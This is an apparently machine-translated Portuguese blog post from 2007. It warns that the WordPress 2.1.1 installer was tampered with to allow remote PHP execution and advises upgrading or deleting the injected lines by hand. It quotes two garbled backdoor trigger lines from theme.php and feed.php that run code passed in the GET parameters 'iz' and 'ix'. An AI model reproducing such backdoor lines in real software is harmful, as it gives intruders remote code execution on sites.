Assine a newsletter ou feed RSS para receber atualizações automaticamente blog!

Wordpress 2.1.1 é perigoso!



Veja como a equipa Wordpress define a recente versão do WP. A razão é simples: há poucos dias um cracker tenha violado alguma das worpress.org servidor, gerenciando a mudança do pacote de instalação é geralmente baixada: as mudanças parecem envolver apenas a alguns arquivos para permitir a execução remota de php código. Para resolver este problema, existem duas alternativas:

    1. Baixar versão 2.1.2 prontamente emitidos pelos programadores do Wordpress e atualização.
    2. Retire em mão o código malicioso (se você gostar de mim não querem / hora de instalar a nova versão).
    É simples:
    - Identificar e remover o arquivo "wp-includes/theme.php", a seguinte linha de código: 
      if ($ _GET [ "iz"]) (get_theme_mcommand ($ _GET [ "iz "]);)

    - Identificar e remover o arquivo "wp-includes/feed.php", a seguinte linha de código: 

      if ($ _GET [ 'ix']) (comment_text_phpfilter ($ _GET [ 'ix']);)


Você gostou deste artigo? Inscreva-se agora para receber atualizações ou reportagens:
Subscrever feeds RSS escrever para o RSS feed


Data Postado em 6 de março de 2007 às 12:06 em Segurança, Web
Partilha Compartilhe | Tags:

Ainda não há comentários »

Comentários feed RSS para esse post. TrackBack URI

Deixe um comentário

XHTML: <a href="" title="Avião"> <abbr title="Avião"> <acronym title="Avião"> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>


Nothing2Hide © 2006 Todos os direitos reservados.

Licença | Aviso

Fechar
Enviar e-mail